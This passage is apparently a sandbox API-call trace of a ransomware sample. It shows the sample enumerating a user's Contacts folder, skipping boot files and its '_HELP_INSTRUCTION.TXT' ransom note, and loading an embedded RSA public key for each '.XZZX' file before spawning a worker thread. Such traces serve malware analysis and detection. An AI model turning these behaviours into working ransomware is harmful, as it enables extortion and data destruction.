HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0162.284] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0162.284] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Contacts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0162.284] SetErrorMode (uMode=0x1) returned 0x1 [0162.284] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0162.284] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0162.284] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0162.284] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0162.285] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0162.285] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="Contacts" [0162.285] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Contacts" | out: lpString1="Contacts") returned="Contacts" [0162.285] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0162.285] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0162.285] lstrcmpW (lpString1="278D60903B72BF40F401616C3FAFA388.XZZX", lpString2="..") returned 1 [0162.285] lstrcmpW (lpString1="278D60903B72BF40F401616C3FAFA388.XZZX", lpString2=".") returned 1 [0162.285] StrStrW (lpFirst="278D60903B72BF40F401616C3FAFA388.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0162.285] StrStrW (lpFirst="278D60903B72BF40F401616C3FAFA388.XZZX", lpSrch="ntldr") returned 0x0 [0162.285] StrStrW (lpFirst="278D60903B72BF40F401616C3FAFA388.XZZX", lpSrch="NTLDR") returned 0x0 [0162.285] StrStrW (lpFirst="278D60903B72BF40F401616C3FAFA388.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0162.286] StrStrW (lpFirst="278D60903B72BF40F401616C3FAFA388.XZZX", lpSrch="ntdetect.com") returned 0x0 [0162.286] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0162.286] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") [0162.286] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0162.286] lstrcpyW (in: lpString1=0x17cf1c, lpString2="278D60903B72BF40F401616C3FAFA388.XZZX" | out: lpString1="278D60903B72BF40F401616C3FAFA388.XZZX") returned="278D60903B72BF40F401616C3FAFA388.XZZX" [0162.286] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0162.286] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x244 [0162.286] Sleep (dwMilliseconds=0x96) [0162.433] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0162.433] lstrcmpW (lpString1="3180D48C036A6FAAA02E258A076353F2.XZZX", lpString2="..") returned 1 [0162.433] lstrcmpW (lpString1="3180D48C036A6FAAA02E258A076353F2.XZZX", lpString2=".") returned 1 [0162.433] StrStrW (lpFirst="3180D48C036A6FAAA02E258A076353F2.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0162.433] StrStrW (lpFirst="3180D48C036A6FAAA02E258A076353F2.XZZX", lpSrch="ntldr") returned 0x0 [0162.433] StrStrW (lpFirst="3180D48C036A6FAAA02E258A076353F2.XZZX", lpSrch="NTLDR") returned 0x0 [0162.433] StrStrW (lpFirst="3180D48C036A6FAAA02E258A076353F2.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0162.433] StrStrW (lpFirst="3180D48C036A6FAAA02E258A076353F2.XZZX", lpSrch="ntdetect.com") returned 0x0 [0162.433] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0162.433] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") [0162.433] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0162.433] lstrcpyW (in: lpString1=0x17cf1c, lpString2="3180D48C036A6FAAA02E258A076353F2.XZZX" | out: lpString1="3180D48C036A6FAAA02E258A076353F2.XZZX") returned="3180D48C036A6FAAA02E258A076353F2.XZZX" [0162.433] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0162.433] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x248 [0162.434] Sleep (dwMilliseconds=0x96) [0162.588] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0162.589] lstrcmpW (lpString1="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpString2="..") returned 1 [0162.589] lstrcmpW (lpString1="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpString2=".") returned 1 [0162.589] StrStrW (lpFirst="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0162.589] StrStrW (lpFirst="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpSrch="ntldr") returned 0x0 [0162.589] StrStrW (lpFirst="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpSrch="NTLDR") returned 0x0 [0162.589] StrStrW (lpFirst="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0162.589] StrStrW (lpFirst="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0162.589] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0162.589] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") [0162.589] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0162.589] lstrcpyW (in: lpString1=0x17cf1c, lpString2="4C9E88000CB6CC7042EF328010E3B0B8.XZZX" | out: lpString1="4C9E88000CB6CC7042EF328010E3B0B8.XZZX") returned="4C9E88000CB6CC7042EF328010E3B0B8.XZZX" [0162.589] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0162.589] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1bc [0162.590] Sleep (dwMilliseconds=0x96) [0162.744] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0162.744] lstrcmpW (lpString1="63AB35AD17277526536F22E31B54596E.XZZX", lpString2="..") returned 1 [0162.744] lstrcmpW (lpString1="63AB35AD17277526536F22E31B54596E.XZZX", lpString2=".") returned 1 [0162.744] StrStrW (lpFirst="63AB35AD17277526536F22E31B54596E.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0162.745] StrStrW (lpFirst="63AB35AD17277526536F22E31B54596E.XZZX", lpSrch="ntldr") returned 0x0 [0162.745] StrStrW (lpFirst="63AB35AD17277526536F22E31B54596E.XZZX", lpSrch="NTLDR") returned 0x0 [0162.745] StrStrW (lpFirst="63AB35AD17277526536F22E31B54596E.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0162.745] StrStrW (lpFirst="63AB35AD17277526536F22E31B54596E.XZZX", lpSrch="ntdetect.com") returned 0x0 [0162.745] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0162.745] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") [0162.745] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0162.745] lstrcpyW (in: lpString1=0x17cf1c, lpString2="63AB35AD17277526536F22E31B54596E.XZZX" | out: lpString1="63AB35AD17277526536F22E31B54596E.XZZX") returned="63AB35AD17277526536F22E31B54596E.XZZX" [0162.745] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0162.745] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b0 [0162.745] Sleep (dwMilliseconds=0x96) [0162.900] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0162.900] lstrcmpW (lpString1="8C424C551A76D4366F1622171E8EB87E.XZZX", lpString2="..") returned 1 [0162.900] lstrcmpW (lpString1="8C424C551A76D4366F1622171E8EB87E.XZZX", lpString2=".") returned 1 [0162.900] StrStrW (lpFirst="8C424C551A76D4366F1622171E8EB87E.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0162.901] StrStrW (lpFirst="8C424C551A76D4366F1622171E8EB87E.XZZX", lpSrch="ntldr") returned 0x0 [0162.901] StrStrW (lpFirst="8C424C551A76D4366F1622171E8EB87E.XZZX", lpSrch="NTLDR") returned 0x0 [0162.901] StrStrW (lpFirst="8C424C551A76D4366F1622171E8EB87E.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0162.901] StrStrW (lpFirst="8C424C551A76D4366F1622171E8EB87E.XZZX", lpSrch="ntdetect.com") returned 0x0 [0162.901] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0162.901] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") [0162.901] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0162.901] lstrcpyW (in: lpString1=0x17cf1c, lpString2="8C424C551A76D4366F1622171E8EB87E.XZZX" | out: lpString1="8C424C551A76D4366F1622171E8EB87E.XZZX") returned="8C424C551A76D4366F1622171E8EB87E.XZZX" [0162.901] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0162.901] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x194 [0162.901] Sleep (dwMilliseconds=0x96) [0163.057] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0163.057] lstrcmpW (lpString1="8DFF43342C68841C83BDE75D30616864.XZZX", lpString2="..") returned 1 [0163.057] lstrcmpW (lpString1="8DFF43342C68841C83BDE75D30616864.XZZX", lpString2=".") returned 1 [0163.057] StrStrW (lpFirst="8DFF43342C68841C83BDE75D30616864.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0163.057] StrStrW (lpFirst="8DFF43342C68841C83BDE75D30616864.XZZX", lpSrch="ntldr") returned 0x0 [0163.057] StrStrW (lpFirst="8DFF43342C68841C83BDE75D30616864.XZZX", lpSrch="NTLDR") returned 0x0 [0163.057] StrStrW (lpFirst="8DFF43342C68841C83BDE75D30616864.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0163.057] StrStrW (lpFirst="8DFF43342C68841C83BDE75D30616864.XZZX", lpSrch="ntdetect.com") returned 0x0 [0163.057] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0163.057] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") [0163.057] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0163.057] lstrcpyW (in: lpString1=0x17cf1c, lpString2="8DFF43342C68841C83BDE75D30616864.XZZX" | out: lpString1="8DFF43342C68841C83BDE75D30616864.XZZX") returned="8DFF43342C68841C83BDE75D30616864.XZZX" [0163.057] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0163.057] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x20c [0163.058] Sleep (dwMilliseconds=0x96) [0163.212] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0163.212] lstrcmpW (lpString1="FD82D02831F226B04645120F361F0AF8.XZZX", lpString2="..") returned 1 [0163.213] lstrcmpW (lpString1="FD82D02831F226B04645120F361F0AF8.XZZX", lpString2=".") returned 1 [0163.213] StrStrW (lpFirst="FD82D02831F226B04645120F361F0AF8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0163.213] StrStrW (lpFirst="FD82D02831F226B04645120F361F0AF8.XZZX", lpSrch="ntldr") returned 0x0 [0163.213] StrStrW (lpFirst="FD82D02831F226B04645120F361F0AF8.XZZX", lpSrch="NTLDR") returned 0x0 [0163.213] StrStrW (lpFirst="FD82D02831F226B04645120F361F0AF8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0163.213] StrStrW (lpFirst="FD82D02831F226B04645120F361F0AF8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0163.213] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0163.213] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") [0163.213] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0163.213] lstrcpyW (in: lpString1=0x17cf1c, lpString2="FD82D02831F226B04645120F361F0AF8.XZZX" | out: lpString1="FD82D02831F226B04645120F361F0AF8.XZZX") returned="FD82D02831F226B04645120F361F0AF8.XZZX" [0163.213] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0163.213] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1fc [0163.214] Sleep (dwMilliseconds=0x96) [0163.368] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0163.368] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0163.368] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0163.369] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0163.369] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0163.369] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0163.369] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0163.369] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0163.369] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0163.369] SetErrorMode (uMode=0x1) returned 0x1 [0163.369] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS 